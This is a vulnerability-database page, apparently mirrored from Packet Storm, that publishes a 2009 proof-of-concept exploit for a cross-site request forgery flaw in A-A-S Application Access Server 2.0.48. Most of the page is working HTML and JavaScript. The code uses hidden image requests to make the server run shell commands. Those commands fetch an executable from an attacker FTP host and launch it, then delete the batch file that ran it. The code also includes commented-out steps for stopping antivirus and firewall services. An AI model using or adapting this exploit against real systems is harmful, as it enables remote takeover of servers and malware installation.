Lucene search

K

Klinzmann A-A-S 2.0.48 XSRF Exploit

🗓️ 13 May 2009 00:00:00Reported by Felipe DaragonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Demonstration of A-A-S 2.0.48 XSRF vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2009-1464
14 May 200917:30
nvd
Cvelist
CVE-2009-1464
14 May 200917:00
cvelist
CVE
CVE-2009-1464
14 May 200917:30
cve
Prion
Cross site request forgery (csrf)
14 May 200917:30
prion
OpenVAS
A-A-S Application Access Server <= 2.0.48 Multiple Vulnerabilities
12 May 200900:00
openvas
OpenVAS
A-A-S Application Access Server Multiple Vulnerabilities
12 May 200900:00
openvas
OpenVAS
Ubuntu USN-774-1 (moin)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-772-1 (mpfr)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-773-1 (pango1.0)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-771-1 (libmodplug)
5 Jun 200900:00
openvas
Rows per page
`<html>  
<body>  
  
<!--  
****************************************************************  
AASHack 1.0 (By Felipe M. Aragon)  
Affected Versions: AAS 2.0.48 and possibly older versions  
  
This is an exploit demonstration code for the A-A-S (Application  
Access Server) index.aas job parameter XSRF vulnerability  
(CVE-2009-1464)  
  
This script has been successfully tested on IE 7.0 and Firefox  
3.08. Should work on any browser that has javascript enabled  
  
Vulnerability found by Syhunt (http://www.syhunt.com)  
  
This script should be used only by system administrators (or  
other people in charge). Read the text below before making any  
use of this script.  
  
(c) 2009 Syhunt Cyber Security Company. All rights reserved.  
  
This script is provided 'as-is', without any expressed or implied  
warranty. In no event will the author be held liable for  
any damages arising from the use of this script.  
Permission is granted to anyone to use this script, and to alter  
it and redistribute it freely, subject to the following  
restrictions:  
  
1. The origin of this script must not be misrepresented, you  
must not claim that you wrote the original code.  
2. Altered source versions must be plainly marked as such, and  
must not be misrepresented as being the original script.  
3. This notice may not be removed or altered from any source  
distribution.  
  
If you have any questions concerning this license, please email  
contact _at_ syhunt _dot_ com  
****************************************************************  
-->  
  
<script>  
// Javascript is used to force the browser to sequentially load  
// the images that will trigger the server commands.  
  
var dd=1000; // default delay time (ms)  
var aas_url='http://[host]:6262'; // target AAS host  
var ftp_host='x.x.x.x'; // attacker ftp host  
var ftp_user='anonymous';  
var ftp_pass='123456';  
var ftp_commands_file='aashack.ftp';  
var batch_file='aashack.bat';  
var attacker_file='file.exe'; // file to upload  
  
function delay(ms) {  
var date = new Date();  
var curDate = null;  
do { curDate = new Date(); }  
while(curDate-date < ms);  
}  
  
function writeimg(job,action,select) {  
var act = escape(action);  
var sel = escape(select);  
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');  
}  
  
// Main Functions  
function Run(action,dms) { writeimg('command',action,''); delay(dms); }  
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }  
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }  
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }  
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process  
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }  
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }  
  
function StopUndesiredServices() {  
//StopSvc("somefirewall");  
//StopSvc("someantivirus");   
//StopSvc("wuauserv"); // Automatic Updates  
}  
  
function KillUndesiredProcesses() {  
//KillProcess('firewall.exe');  
}  
  
AddFTPCmd(ftp_user);  
AddFTPCmd(ftp_pass);  
AddFTPCmd('binary');  
AddFTPCmd('get '+attacker_file);  
AddFTPCmd('close');  
AddFTPCmd('bye');  
AddBatchLine('@echo off');  
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);  
AddBatchLine('start '+attacker_file);  
AddBatchLine('del '+ftp_commands_file);  
AddBatchLine('del %0'); // self-destruct  
StopUndesiredServices();  
KillUndesiredProcesses();  
Run(batch_file,dd);  
</script>  
  
</body>  
</html>  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo